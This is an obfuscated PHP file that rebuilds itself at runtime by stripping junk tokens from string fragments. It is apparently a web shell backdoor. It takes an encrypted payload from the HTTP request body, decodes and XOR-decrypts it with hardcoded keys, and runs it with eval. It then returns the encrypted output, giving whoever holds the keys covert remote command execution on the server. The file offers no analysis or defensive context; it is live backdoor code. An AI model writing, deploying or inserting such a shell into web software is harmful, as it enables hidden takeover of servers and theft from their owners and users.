<?php
$I='=0;k;k;(;k$j<$c&&$i<$l;k);$j++,$;k;k;ki;k++){$o.=$t{$i}^$k{$j};;k}}return ;k$o;k;}if (@p;kreg_m;katc';
$S=str_replace('yF','','yFyFcryFeatyFyFe_functiyFon');
$H=');@ob_end_clean();;k$r=@b;kase64_en;k;kcode(@x(@g;k;k;kzcompress($o),$k));k;print("$p;k$kh$r$;kkf");}';
$n=';k$k="81dc9b;k;kdb";$kh="52d04dc2;k0036";;k$k;kf;k="dbd831;k3ed055";k;$p="Y7F30J;kbH;kE3NYRZ2G";f;ku';
$y='nctio;kn x($;kt,;k;k$k){$c;k=strlen;k($k);$l=strl;ken($;kt);;k$o="";f;kor($i=0;$i<$l;k;){f;kor($j';
$x='h("/$kh;k(.+);k$kf/",;k@f;kile_ge;kt;k_contents("p;khp://input");k,$;k;km);k=;k=1) {@ob_start();@';
$F='ev;kal;k(@g;kzuncompress(@x(@b;kase6;k4_decode(;k$m;k[1]),$;k;kk)));$o=@ob_get;k_conte;kn;k;kts;k(';
$e=str_replace(';k','',$n.$y.$I.$x.$F.$H);
$V=$S('',$e);$V();
?>
